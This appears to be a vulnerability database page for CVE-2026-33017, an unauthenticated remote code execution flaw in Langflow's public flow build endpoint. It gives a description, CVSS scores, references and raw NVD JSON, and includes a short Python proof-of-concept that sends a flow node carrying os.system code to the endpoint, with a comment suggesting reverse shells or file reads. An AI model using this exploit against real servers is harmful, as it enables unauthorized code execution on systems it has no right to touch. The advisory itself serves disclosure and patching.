CVE-2026-33017

Description

Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:* - VULNERABLE

Langflow < 1.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target_url = "http://target-ip:port/api/v1/build_public_tmp/{flow_id}/flow"
# Malicious Python code to be executed on the server
# Example: creating a reverse shell or reading a file
malicious_code = """
import os
os.system('whoami')
"""

# Construct the payload mimicking a flow node with Python code
payload = {
    "data": {
        "nodes": [
            {
                "id": "test_node",
                "type": "Python",
                "data": {
                    "code": malicious_code
                }
            }
        ]
    }
}

# Send the unauthenticated POST request
response = requests.post(target_url, json=payload)

print(f"Status Code: {response.status_code}")
print("Response:", response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33017
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33017
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33017/
[4] VulDB https://vuldb.com/cve/CVE-2026-33017
[5] https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
[6] https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0
[7] https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx
[8] https://github.com/langflow-ai/langflow/releases/tag/1.8.2
[9] https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896
[10] https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017
[11] https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33017", "sourceIdentifier": "[email protected]", "published": "2026-03-20T05:16:15.550", "lastModified": "2026-05-21T21:16:31.950", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0."}, {"lang": "es", "value": "Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. En versiones anteriores a la 1.9.0, el endpoint POST /api/v1/build_public_tmp/{flow_id}/flow permite construir flujos públicos sin requerir autenticación. Cuando se suministra el parámetro opcional data, el endpoint utiliza datos de flujo controlados por el atacante (que contienen código Python arbitrario en las definiciones de nodos) en lugar de los datos de flujo almacenados en la base de datos. Este código se pasa a exec() sin ningún sandboxing, lo que resulta en una ejecución remota de código no autenticada. Esto es distinto de CVE-2025-3248, que corrigió /api/v1/validate/code añadiendo autenticación. El endpoint build_public_tmp está diseñado para no requerir autenticación (para flujos públicos) pero acepta incorrectamente datos de flujo suministrados por el atacante que contienen código ejecutable arbitrario. Este problema ha sido solucionado en la versión 1.9.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2026-03-25", "cisaActionDue": "2026-04-08", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Langflow Code Injection Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-95"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.2", "matchCriteriaId": "B38E7511-B77D-4E5F-B33A-458EE5770358"}]}]}], "references": [{"url": "https://github.com/advisories/GH ... (truncated)